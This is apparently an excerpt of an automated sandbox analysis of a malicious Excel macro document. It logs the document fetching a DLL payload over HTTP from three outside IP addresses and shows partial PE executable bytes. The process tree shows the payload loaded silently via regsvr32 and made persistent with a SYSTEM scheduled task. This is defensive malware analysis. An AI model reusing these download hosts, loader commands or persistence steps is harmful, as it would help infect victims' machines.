      Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 24, 2021 15:59:27.614068985 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:27.817226887 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:27.817347050 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:27.818121910 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:28.029831886 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861392021 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861428022 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861438990 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861450911 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861462116 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861474991 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861483097 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861494064 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861505032 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861516953 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861849070 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:28.875869989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.068849087 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068880081 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068892956 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068908930 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068922043 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068938971 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068957090 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068974018 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068989992 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069005966 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069025040 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069042921 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069058895 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069073915 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069089890 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069103003 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069118023 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069133043 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069152117 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069169044 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069197893 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.069231033 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.069236040 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.072541952 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284091949 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284166098 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284193039 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284216881 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284239054 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284262896 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284284115 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284302950 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284321070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284337997 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284356117 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284365892 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284373045 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284389019 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284390926 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284404993 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284420967 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284440041 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284455061 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284457922 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284473896 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284490108 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284506083 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284512997 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284521103 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284537077 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284563065 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284578085 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284579039 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284609079 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284646034 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284950972 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285017014 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285069942 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285068989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285093069 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285131931 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285142899 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285156965 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285180092 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285196066 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285202026 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285226107 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285243034 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285244942 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285257101 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285263062 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285284042 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285307884 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285315037 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285331011 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285346031 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285368919 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285392046 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.286144018 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.287856102 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287879944 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287895918 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287969112 CEST4916780192.168.2.22190.14.37.173

      HTTP Request Dependency Graph

      • 190.14.37.173
      • 111.90.148.104
      • 51.89.115.111

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167190.14.37.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:27.818121910 CEST0OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
      Sep 24, 2021 15:59:28.861392021 CEST1INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:28 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249168111.90.148.10480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:31.410495043 CEST519OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
      Sep 24, 2021 15:59:32.366945982 CEST520INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.224916951.89.115.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 24, 2021 15:59:49.888041019 CEST1040OUTGET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
      Sep 24, 2021 15:59:50.080285072 CEST1042INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:50 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 1180 Parent PID: 596

      General

      Start time:16:00:15
      Start date:24/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f6d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 1912 Parent PID: 1180

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1760 Parent PID: 1912

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa.der
      Imagebase:0x5d0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 2520 Parent PID: 1760

      General

      Start time:16:01:09
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2428 Parent PID: 1180

      General

      Start time:16:01:10
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa1.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: schtasks.exe PID: 2604 Parent PID: 2520

      General

      Start time:16:01:11
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
      Imagebase:0xfc0000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1724 Parent PID: 2428

      General

      Start time:16:01:11
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa1.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

